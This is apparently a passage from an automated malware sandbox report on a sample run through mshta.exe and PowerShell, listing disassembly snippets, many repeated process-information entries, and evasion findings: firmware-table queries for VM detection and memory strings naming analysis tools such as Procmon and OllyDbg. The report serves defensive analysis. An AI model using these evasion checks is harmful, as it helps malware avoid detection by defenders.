                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E94960 push 2807CC51h; ret 2_2_00E94A55
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E94A48 push 2807CC51h; ret 2_2_00E94A55
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E94DED push esp; iretd 2_2_00E94E21
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E950FB push edi; iretd 2_2_00E9510A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E950F5 push esi; iretd 2_2_00E950FA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E95095 push esp; iretd 2_2_00E950AA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E95062 push edx; iretd 2_2_00E9506A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E95079 push ebx; iretd 2_2_00E9507A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E9507B push ebx; iretd 2_2_00E9508A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E95045 push edx; iretd 2_2_00E9504A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E95005 push eax; iretd 2_2_00E9501A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E93DC0 push cs; iretd 2_2_00E93DCA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E93DD5 push cs; iretd 2_2_00E93DDA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E93EDB push ss; iretd 2_2_00E93EEA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00E93FFD push ds; iretd 2_2_00E94002
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00862205 pushfd ; retf 4_2_00862209
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00DAB562 push esp; retf 4_2_00DAB575
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D640B5 push es; ret 4_2_06D640B8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06D9A087 push es; retf 4_2_06D9A088
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB2BCD push es; iretd 4_2_06DB2BD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB2C1D push es; retf 4_2_06DB2C28
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DBADBD push edx; retf 4_2_06DBADC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06DB2D51 push es; iretd 4_2_06DB2D54
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0739D5AD push FFFFFFD6h; ret 4_2_0739D5C4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046D810 push eax; mov dword ptr [esp], 707F7E0Dh8_2_0046D812
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0046AE30 push eax; mov dword ptr [esp], 1D1E1F10h8_2_0046AE3E
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
                Source: powershell.exe, 00000002.00000002.2250678639.00000000049A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
